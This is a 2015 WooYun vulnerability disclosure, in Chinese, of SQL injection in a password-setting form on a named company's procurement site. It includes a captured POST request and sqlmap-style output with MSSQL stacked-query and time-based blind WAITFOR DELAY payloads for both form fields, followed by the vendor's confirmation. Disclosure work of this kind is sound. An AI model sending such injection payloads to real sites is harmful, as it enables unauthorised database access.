乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-19: 细节已通知厂商并且等待厂商处理中 2015-04-21: 厂商已经确认,细节仅向厂商公开 2015-05-01: 细节向核心白帽子及相关领域专家公开 2015-05-11: 细节向普通白帽子公开 2015-05-21: 细节向实习白帽子公开 2015-06-05: 细节向公众公开
RT
http://cg.chaoxing.com/set_password.aspx 这个页面是禁止使用的,但是在随后的过程中,通过抓包可以定位到可注入的页面。
简单测试一下 存在POST注入。post.txt文件如下:
POST /set_password.aspx HTTP/1.1Host: cg.chaoxing.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://cg.chaoxing.com/set_password.aspxCookie: msign_dsr=1428996158882; __utma=68824131.282036900.1428999176.1428999176.1429147930.2; __utmz=68824131.1428999176.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=68824131.3.9.1429147931475; __utmc=68824131Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 167__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjY5MDI0MjlkZA%3D%3D&TextBox1=111%40qq.com&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF
Place: POSTParameter: TextBox1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]'; WAITFOR DELAY '0:0:5'--&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]' WAITFOR DELAY '0:0:5'--&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AFPlace: POSTParameter: TextBox2 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]&TextBox2=123123123123'; WAITFOR DELAY '0:0:5'--&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]&TextBox2=123123123123' WAITFOR DELAY '0:0:5'--&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF---
两个参数都存在注入。。
严格过滤
危害等级:中
漏洞Rank:10
确认时间:2015-04-21 13:29
影响公司采购系统,感谢漏洞提出者
暂无